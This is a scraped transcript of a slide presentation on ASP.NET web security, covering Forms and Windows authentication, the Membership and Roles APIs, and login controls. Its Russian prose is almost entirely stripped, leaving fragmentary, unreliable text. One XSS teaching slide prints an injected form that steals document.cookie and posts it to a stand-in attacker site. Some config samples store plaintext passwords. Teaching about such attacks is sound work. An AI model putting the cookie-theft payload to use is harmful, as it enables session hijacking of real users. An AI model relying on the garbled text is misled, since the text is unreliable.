11
This presentation is the property of its rightful owner.
Sponsored Links
1 / 121

Web PowerPoint PPT Presentation


  • 128 Views
  • Uploaded on
  • Presentation posted in: General

??????????? ??????? web ??????????. ??????? ??? ????????? ???????? (??????), ??????? ??????????? ???????????.??????????? ???????:?????????????? ? ??????? ????????????? ???????????? (??? ?????????, ??? ??? ??? ????????????, ??????? ?????? ? ??);?????????? ???????? ???????? (Membership API) ? ?????

Download Presentation

Web

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


Web

11

Web


Web

web

  • (), .

  • :

    • ( , , );

    • (MembershipAPI) .

    • .

    • ( ) (, , ) .

    • (profile, ).

    • (Criptography)

    • .


Web

  • :

    • , .

    • , .

    • (web.config).


Asp net

ASP.NET

  • ASP.NET provides security features in addition to those provided by IIS

    • Oriented around client authentication

    • Several method available for integrating authentication into your pages

    • Managed through web.config

  • Accessing authenticated client information

    • The User property of the Page class provides access to current client information


Authentication and authorization

Authentication and Authorization

  • Authentication Modes

    • Mode=None

    • Mode=Windows

    • Mode=Forms

  • Authorizing clients

    • Authorization element used to describe which clients are granted access

    • Supports sub elements allow and deny

      • Users, roles, verbs

      • ? represents anonymous

      • * represents all clients

    • The first match found (allow or deny) determines authorization


Windows authentication

Windows Authentication

  • Users credentials defined in active directory

  • Leverage IIS to perform authentication

    • IIS challenges browser by sending a 401 status code

    • IIS forwards the username to ASP.NET


Forms authentication

Forms Authentication

  • Common approach for performing application-level authentication

    • Application manages storage of credentials

    • Application handles authentication

  • FormsAuthentication class

  • Credential Management and storage


Security providers for common tasks

Security providers for common tasks

  • Membership providers

    • Works with xxMembershipProvider to simplify common tasks in building security infrastructure

      • CreateUser

      • DeleteUser

      • ChangePassword

      • ValidateUser

  • Role providers

    • xxRoleProvider implements common role-based authorization features

      • CreateRole

      • IsUserInRole

      • GetAllRoles

      • GetRolesForUser

  • Several new controls generate large pieces of security UI


Example login control

Example: Login control

  • Building a login page now consists of:


How it works

How it works


Where s the data

Wheres the data?


Membership controls

Membership controls

  • Several new controls available that tap into the membership and role providers

    • <asp:Login ... />

      • login authentication form

    • <asp:LoginView ... />

      • alternate views based on identity

    • <asp:PasswordRecovery ... />

      • password retrieval form (only with un-hashed passwords)

    • <asp:LoginStatus ... />

      • Status and hyperlink to login/logout based on the state

    • <asp:LoginName ... />

      • displays username for authenticated users

    • <asp:CreateUserWizard ... />

      • form for entering new users

    • <asp:ChangePassword ... />

      • form for changing password


Asp net1

ASP.Net

  • , web-.

  • web .

  • (security) (, , ) . :

    • ;

    • ,

      • .

  • ASP.Net (framework) , . :

    • , .

    • () , .


Web

  • web :

    • ( ),

  • , , .

    • , , .

    • ( SSL )

    • ( ).


Web

  • web :

    • . .

    • SQL . ( ), SQL .

    • web () (encoding). HTML (, ), (cross-site scripting vulnerabilities). HttpUtility.HtmlEncode() , < >, , .

    • , web web . , web , . , web . plug-ins , .


Web

  • , web view state: View state . EnableViewStateMAC true, view state , machine key machine.config web . EnableViewStateMAC=true, , view state, web .

  • SSL ASP.NET .

  • : , timeouts , .

  • SSL: , web , web SSL. (image directories) SSL.


Web

  • view state: View state .

  • EnableViewStateMAC = true , view state message authentication code, machine key machine.config web server. EnableViewStateMAC=true, view state , , .

  • SSL (Secure Sockets Layer) ASP.NET .

  • cookies: , , , timeouts , , .

  • SSL: , web , website SSL. , SSL.


Web

(XSS).

  • (XSS, Cross Site Scripting) , HTML- .

  • , , , : <,>,, .

    Response.Write(Request.QueryString(name));

  • :

    <a href=http://www.contoso.com/req.asp?name=

    <FORM action=http://www.badsite.com/data.asp method=post id=badForm>

    <input name=cookie type=hidden>

    </FORM> <SRIPT>

    badForm.cookie.value=document.cookie;

    badForm.submit();

    </SCRIPT> > ! </a>.


Gatekeepers

- Gatekeepers

  • Gatekeepers , .

  • , , . (gatekeeper), .

  • , .


Web

  • (Authentication) , ( ).

  • (Authorization) , .

  • (Confidentiality) , , , . web . ( ), .

  • (Integrity) , , , . .


Asp net2

ASP.Net

  • ASP.NET

  • .NET Framework System.Security

  • SSL , web .


Web

  • . .

  • , (identity) (, )

  • ASP.Net :

    • Windows

    • Forms

    • Pasport

    • (custom)

  • .

  • (identity) .

    • , Windows OC 96 , SID (security ID), .

  • ASP.Net Forms , .

  • , , , . (personalization) (customization), web , , ..


Authorization

(Authorization)

  • .

  • (role-based authorization). , .

  • web .

  • , , .

  • , ASP.Net , web .

  • , (, , , ) OC Windows Windows, .

  • ASP.Net ( IIS 5 ASPNET).


Co nfidentiality integrity

(confidentiality Integrity)

  • , , .

  • , , .

  • .

  • , . ASP.Net , . .

  • web :

    • . SSL. SSL . SSL ASP.Net, IIS.

    • .


Web

web , . Web , . , . web . web , , :

web . (identity) , (, web ). .

, web IIS ( Windows ).

, web . , .


Web

web ,


Web

web

  • web , , , , :

  • web . (identity) , (, web - login dialog box). .

  • , web . .

  • (credentials) (roles) , . , ; .

  • , (log in again) , (access denied message).


Web

web ,


Internet information services

Internet Information Services

  • ASP.Net , IIS .

  • IIS :

    • : IIS , Windows. .. IIS Windows . IIS

      • Digest

      • Passport

      • Windows

      • Certificate SSL.

    • : IIS IP Windows ACL (Access Control Lists), , .

    • : SSL.


Iis 5 x iis 6 0

IIS 5.x IIS 6.0

  • ASP.Net Windows , IIS Basic ( Digest) .

  • ASP.Net Windows ( form ), IIS .


Iis 5 6

IIS 5 6

  • , web


Web

  • "Windows authentication" IIS (credentials) Windows . , , , .

  • "Basic authentication" W3C HTTP (header) . , . Base64. , Basic authentication SSL. Windows authentication, Windows. . , Basic authentication HTTP header, Windows authentication NTLM (Windows NT LAN Manager) - - ) Kerberos.

  • "Digest authentication" "Basic authentication". , Base64, . , , ( ).


Web

  • "Passport authentication" Microsoft Passport. Microsoft Passport (). - Passport server. Microsoft, Passport . , .NET Passport authentication, , .NET Framework.

  • Passport authentication, "Windows Live ID", Windows Live. Windows Live ID ID, , Passport.

  • IIS - certificate authentication, SSL.


Iis 5 61

IIS 5 6

  • , IP IIS.

  • IP web .

  • , web .


Iis 5 6 iis 7

IIS 5(6) IIS 7


Asp net3

ASP.Net

  • Gatekeepers

  • HTTP . IHttpModule


Asp net4

ASP.Net

  • HTTP , IHttpModule HttpApplication.AuthenticateRequest. Authenticat, Gloabal.asax .

  • <authentication> web.config web .

  • ASP.NET :

    • FormsAuthenticationModule

    • WindowsAuthenticationModule

    • PassportAuthenticationModule


Web

  • Web

  • Global.asax

  • HTTP


Asp net5

ASP.Net

  • FormsAuthenticationModule , (login page) , ASP.Net .

  • ,

    <authentication mode="Forms" />

  • :

    <authentication mode="Windows" />

    <authentication mode="Passport" />


Asp net6

ASP.Net

  • , , (security context) ASP.NET .

  • HttpContext.Current.User .

  • ASP.NET :

  • UrlAuthorization: <authorization> web.config web . ..

  • FileAuthorization: Windows , ASP.NET FileAuthorization Windows Windows ACL ( ). , Windows , , (read access rights) , web . Windows .

  • web , web . HttpContext.Current.User (role membership) .


Web

Forms Authentication


Forms authentication1

Forms Authentication

  • (ticket token).

  • , (ticket) . , , .

  • web , , ASP.Net .

  • , ASP.Net (login page). .

  • , ASP.Net ( FormsAuthentication) ( - ticket) .

  • , ticket .


Web

  • , Windows.

  • Form Authentication

    • ;

    • (login form); (Login control).

    • , HTML;

    • .

  • (login page), .

  • ( ).


Web

  • Forms Authentication web.config.

  • . .

  • membership API, .

  • .

    • , , web .

    • , , , - .

  • membership API ASP.Net profiles API, .


Forms autentification

Forms Autentification

1. web.config

2. IIS, ASP.Net web .

3. (login page), , .


Forms authentification

Forms Authentification

  • <authentication mode="Forms">

  • <!-- Detailed configuration options -->

  • <forms name="MyCookieName"

  • loginUrl="DbLogin.aspx"

  • timeout="20">

  • <credentials

  • passwordFormat="Clear">

  • <user name=admin"

  • password =aaaaa"/>

  • <user name=mario"

  • password=bbbbb"/>

  • <user name=petr"

  • password=ccccc"/>

  • </credentials>

  • </forms>

  • </authentication>

  • <authentication mode="Forms">

    <!-- Detailed configuration options -->

    </authentication>

  • <authentication mode="Forms">

    <!-- Detailed configuration options -->

    <forms name="MyCookieName"

    loginUrl="DbLogin.aspx"

    timeout="20"

    slidingExpiration="true"

    cookieless="AutoDetect"

    protection="All"

    requireSSL="false"

    enableCrossAppRedirects="false"

    defaultUrl="MyDefault.aspx"

    domain="www.mydomain.com"

    path="/"

    />

    </authentication>


Forms authentication2

Forms Authentication


Web config

web.config

<authentication mode="Forms">

<!-- Detailed configuration options -->

<forms name="MyCookieName">

<credentials passwordFormat="Clear">

<user name="Admin" password="(Admin1)"/>

<user name="Mario" password="Szpuszta"/>

</credentials>

</forms>

</authentication>

<!-- -->

<authorization>

<deny users="?" />

</authorization>


Web config1

web.config

  • web.config:

    <authentication mode="Forms">

    <!-- Detailed configuration options -->

    <forms name="MyCookieName"

    loginUrl="DbLogin.aspx"

    timeout="20">

    <credentials passwordFormat="Clear">

    <user name="Admin" password="(Admin1)"/>

    <user name="Mario" password="Szpuszta"/

    <user name="Matthew" password="MacDonald"/>

    </credentials>

    </forms>

    </authentication>

  • web.config . . , , . ( , ).


Web config2

web.config

  • <credentials /> <forms /> passwordFormat, :

  • Clear - <user />

  • MD5 - MD5.

  • SHA1 - SHA1. .


Web

  • string hashedPwd =

    FormsAuthentication.HashPasswordForStoringInConfigFile(clearTextPassword, "SHA1");

  • web.config

  • web.config

    Configuration MyConfig = WebConfigurationManager.OpenWebConfiguration("~/");

    ConfigurationSectionGroup SystemWeb = MyConfig.SectionGroups["system.web"];

    AuthenticationSection AuthSec =

    (AuthenticationSection)SystemWeb.Sections["authentication"];

    AuthSec.Forms.Credentials.Users.Add(

    new FormsAuthenticationUser(UsernameText.Text, PasswordText.Text));

    MyConfig.Save();


Web

  • <authorization> :

    <configuration>

    <system.web>

    <!-- Other settings omitted. -->

    <authorization>

    <deny users="?" />

    </authorization>

    </system.web>

    </configuration>

  • (?) . , . forms authentication ticket ( ). ASP.NET login page ( , ).

  • <authentication>, <authorization> web.config web . web .


Web

web


Iis 7 0 forms authentication

IIS 7.0 Forms Authentication

  • IIS7 .

  • IIS7 web.config ( ).

  • forms authentication IIS7.

    • .


Form authentication

form authentication


Web


Web


Forms authentication3

Forms Authentication

  • FormsAuthentication forms authentication. ticket, cookie, login page , .

  • FormsIdentity IIdentity forms authentication. Ticket, forms authentication ticket. ticket.


Formsauthentication

FormsAuthentication

  • web .

  • forms authentication. ticket, cookie, login page , .


Web


Web

Click :

protected void LoginAction_Click(object sender, EventArgs e)

{

Page.Validate();

if (!Page.IsValid) return;

if (FormsAuthentication.Authenticate(UsernameText.Text, PasswordText.Text)) {

// Create the ticket, add the cookie to the response,

// and redirect to the originally requested page

FormsAuthentication.RedirectFromLoginPage(UsernameText.Text, false);

}

else

{

// User name and password are not correct

LegendStatus.Text = "Invalid username or password!";

}

}


Formsauthentication1

FormsAuthentication

  • Authenticate(UsernameText.Text, PasswordText.Text)

    true , false.

  • RedirectFromLoginPage(UsernameText.Text, false);

    :

  • authentication ticket.

  • authentication ticket.

  • ticket.

  • HTTP response, .

  • ( ).

  • SignOut();

  • RedirectToLoginPage(); .


User page

User Page

  • System.Security.Principal

  • User rincipal, , , .

  • User :

    • Identity ( Identity)

      • Name,

      • IsAuthenticated,

      • AuthenticationType;

    • bool IsInRole( stringrole ).


Principal identity

Principal Identity

  • Principal :

    • Identity, Identity, .

    • IsInRole() .

  • Identity d :

    • AuthenticationType: (forms, Passport,NTLM, custom).

    • IsAuthenticated: true false.

    • Name: .


Web

  • Principal IsInRole(), . true .

  • ::

    if (User.IsInRole("Supervisors"))

    {

    // Do nothing, the page should be accessed as normal because the

    // user has administrator privileges.

    }

    else

    {

    // Don't allow this page. Instead, redirect to the home page.

    Response.Redirect("default.aspx");

    }


Web

(), (Membership, Roles, and Profile)


Api membership roles api

API (Membership RolesAPI)

  • ( ) API.

  • Membership API . , , .

  • Roles API , (roles)/ .

  • Profiles API , . (user profile) , web . , .


Web

  • Membership , .

  • Roles .

  • Profiles .


Web

Membership API


Membership

- Membership

  • .

  • membership API. Forms Authentication. API (login pages credential storage).

  • Membership API . .. .


Asp net membership api

ASP.Net Membership API

  • .

  • , e-mail ( e-mail ).

  • , . , E-mail.

  • . , web .

    • (login pages)

    • (registration pages)

    • .

  • , (membership provider classes). API , .

  • , membership API SQL Server Express .


Membership api

Membership API


Membership api1

Membership API

  • - System.Web.Security


Membership1

Membership


Membership2

Membership

  • Membership :


Membership3

Membership

  • GetUser- MembershipUser , . , .

  • ValidateUser user name password. , login.

  • FindUsersByEmail membership , e-mail e-mail .

  • FindUsersByName- membership , .

  • GeneratePassword .


Web

  • GetAllUsers .

  • GetNumberOfUsersOnline 1 .

  • GetUserNameByEmail e-mail e-mail .

  • UpdateUser ..

  • CreateUser

  • DeleteUser .


Web

  • :

    Membership.ValidateUser(UserNameText.Text, PasswordText.Text)

  • :

    MembershipCreateStatus Status;

    Membership.CreateUser(UserNameText.Text,

    PasswordText.Text,

    UserEmailText.Text,

    PwdQuestionText.Text,

    PwdAnswerText.Text, true,

    out Status);


Membershipuser

MembershipUser

  • membership membership

    • UserName

    • Email

    • Comment

    • CreationDate

    • PasswordQuestion

    • LastLoginDate

    • Comment

    • CreationDate

  • :

    • GetPassword()

    • ChangePassword()


Web

Roles API


Roles api role based authorization

Roles API Role-Based Authorization

  • ASP.NET membership API.

  • , :

    • , .

    • SQL Server , Membership. many-to-many , aspnet_regsql.exe.

    • , RoleManagerModule, RolePrincipal.

    • Roles.


Web

web

  • Enable Roles Web Site Security Setup Wizard Enable Roles Security WAT.

  • <configuration>

    <system.web>

    <roleManager enabled="true" />

    <authentication mode="Forms" />

    </system.web>

    </configuration>


Web

  • API , RoleManagerModule RolePrincipal, identity , .

  • RolePrincipal IPrincipal, principal . , identity IsInRole().

  • principal.

  • , IsInRole().


Roles

Roles

:

  • CreateRole(roleName) ;

  • DeleteRole(roleName) ;

  • AddUserToRole(userName, roleName) ( );

  • IsUserInRole(roleName) / IsUserInRole(userName, roleName) , (true ; false - ).

  • GetAllRoles() .

  • GetRolesForUser() / GetRolesForUser(userName) / .

    if (!Roles.IsUserInRole(EveryoneRoleName) &&

    Roles.RoleExists(EveryoneRoleName))

    {

    Roles.AddUserToRole(User.Identity.Name,EveryoneRoleName);

    }


Web

  • AddUserToRole (user name) (role name); string.

  • CreateRole .

  • DeleteRole .

  • FindUsersInRole . , (usernameToMatch).

  • IsUserInRole true, .

  • RemoveUserFromRole .

  • RoleExists true, .


Web

web


Web

  • .

  • Enable Roles for This Web Site, Security Setup Wizard Enable Roles Security WAT.

  • .


Web

web-

  • Web . Web , , . (, , , ), .

  • ASP.NET Membership.

  • , .

  • .

  • , .

  • Simple Mail Transport Protocol (SMTP) . Application Web Site Administration Tool.

  • Visual Studio.


Membership api2

Membership API

ASP.NET membership API :

1. forms web.config .

2. membership . , SQL Server, SQL Server.

3. membership, web.config.

4. membership web , membership API functions.

5. (login page), Login login page, Membership .

( ) ASP.NET WAT, (security wizard).

Web Site -> ASP.NET Configuration Visual Studio.


Asp net membership

ASP.NET Membership

  • ASP.NET Web application Visual Studio. (, ), .

  • Website ASP.NET Configuration.

  • ( ) Security () Use The Security Setup Wizard ( ) .

  • 1, Next.

  • 2, From The Internet ( ) ASP.NET membership ( ) From A Local Area Network ( ) Windows . Next.

  • 3, , Advanced Provider Settings. Microsoft SQL 2005 Server Express Edition App_Data Web . Next.


Asp net membership1

ASP.NET Membership ()

7. 4, . , . Enable Roles For This Web Site. Next.

8. , , ., Users Administrators. Next.

9. 5, Create User. . Next.

10. 6, , . Next.

11. 7, Finish. Security Web Site AdministrationTool, , .


Web

  • ASP.NET SQL Server Express Edition, membership . (Security) WAT . . SqlMembershipProvider. SQL Server 2005 Express Edition!

  • SQL Server, .

  • ASPNETDB.MDB web App_Data.

  • ,

    • ;

    • ;

    • ;

    • .


Web

  • , ASP.NET MDB ASPNETDB.MDF, web App_Data.

  • , :

  • aspnet_regsql.exe TSQL, .NET Framework.

  • .

  • <roleManager>.

  • .

  • <roleManager>, WAT.

    <configuration>


Web

  • ASP.Net aspnet_regsql.exe web .

    • Wizard interface ()

  • InstallCommon.sql

    sqlcmd -S (local)\SQLExpress -E -i InstallCommon.sql


Wizard as p net regsql exe

Wizard aspnet_regsql.exe


Aspnet regsql exe

aspnet_regsql.exe


Web

  • <connectionStrings>

    <add name="MyMembershipConnString"

    connectionString="data source=(local)\SQLEXPRESS;

    Integrated Security=SSPI;

    initial catalog=MyDatabase" />

    </connectionStrings>

  • <system.web>

    <authentication mode="Forms" />

    <membership defaultProvider="MyMembershipProvider">

    <providers>

    <add name="MyMembershipProvider"

    connectionStringName="MyMembershipConnString"

    applicationName="MyMembership"

    enablePasswordRetrieval="false"

    enablePasswordReset="true"

    requiresQuestionAndAnswer="true"

    requiresUniqueEmail="true"

    passwordFormat="Hashed"

    type="System.Web.Security.SqlMembershipProvider" />

    </providers>

    </membership>

    </system.web>


Web

  • membership

    • WAT Website -> ASP.NET Visual Studio

    • (Security)

    • Create User.

  • aspnet_Users aspnet_Membership :

    • Visual Studio Server Explorer ( membership Server Explorer)

    • SQL Server Management Studio

  • aspnet_Membership (password) (password question) passwordFormat="Hashed" <membership> web.config.


Iis 7 0

IIS 7.0


Iis 7 01

IIS 7.0


Web

WAT


Web

-


Web


Web


Web

web

  • Login , , . Login control ASP.NET, Authenticate.

  • LoginView . , , .

  • LoginStatus login , logout .

  • LoginName , .

  • PasswordRecovery - , e-mail .

  • CreateUserWizard .

  • ChangePassword .


Login

Login

  • , . Log In .

  • Log In, membership API function Membership.ValidateUser(), FormsAuthenication.RedirectFromLoginPage(), .

  • UI Login . , Remember me next time, true createPersistentCookie RedirectFromLoginPage(). FormsAuthenticationModule .

  • layout , , .

  • membership provider web .


Login1

Login

<asp:Login ID="Login1" runat="server"

BackColor="aliceblue"

BorderColor="Black" BorderStyle="double"

CreateUserText="Register"

CreateUserUrl="Register.aspx"

HelpPageText="Additional Help"

HelpPageUrl="HelpMe.htm"

InstructionText=" <br> .">

<LoginButtonStyle BackColor="DarkBlue" ForeColor="White" />

<TextBoxStyle CssClass="MyLoginTextBoxStyle" />

<TitleTextStyle Font-Italic="True" Font-Bold="True"

Font-Names="Verdana" />

</asp:Login>


Login2

Login


Login3

Login

protected void Page_Load(object sender, EventArgs e){

if (!this.IsPostBack)

ViewState["LoginErrors"] = 0;

}

protected void LoginCtrl_LoginError(object sender, EventArgs e){

// If the "LoginErrors" state does not exist, create it

If(ViewState["LoginErrors"] == null)

ViewState["LoginErrors"] = 0;

// Increase the number of invalid logins

int ErrorCount = (int)ViewState["LoginErrors"] + 1;

ViewState["LoginErrors"] = ErrorCount;

// Now validate the number of errors

if ((ErrorCount > 3) && (LoginCtrl.PasswordRecoveryUrl != string.Empty))

Response.Redirect(LoginCtrl.PasswordRecoveryUrl);

}


Login4

Login

1. login page Login.aspx. , web.config.

2. login Login . Login , . Login id .


Web


Web

  • ValidationSummary ValidationSummary.ValidationGroup ID Login. , .

  • PasswordRecovery. , ID , e-mail. .


Web

5. LoginStatus . LoginStatus , . master pages, LoginStatus master page.

  • , , ASP.NET membership Web Site Administration Tool (WAT), Login .

  • (credentials), membership, LoginStatus .

  • , Login , .

  • Login.LoginError (Security event log). PasswordRecovery.UserLookupError PasswordRecovery.AnswerLookupError. , .


Web

1. , , NewUser.aspx.

  • CreateUserWizard. (name), (password), e-mail, .

  • CreateUserWizard .


Web


Web

3. ContinueButtonClick. , , , :

protected void CreateUserWizard1_ContinueButtonClick(object sender, EventArgs e)

{

Response.Redirect("Members/Default.aspx");

}

, .

( , Users) CreateUserWizard.CreatedUser Roles.AddUserToRole.


Web

1. , , ManageUser.aspx.

  • ChangePassword

  • ValidationSummary ValidationSummary.ValidationGroup ID ChangePassword. , . , Confirm New Password, ChangePassword . ValidationSummary, Confirm New Password is required. Login, ValidationSummary.

    4. ContinueButtonClick. , .


  • Login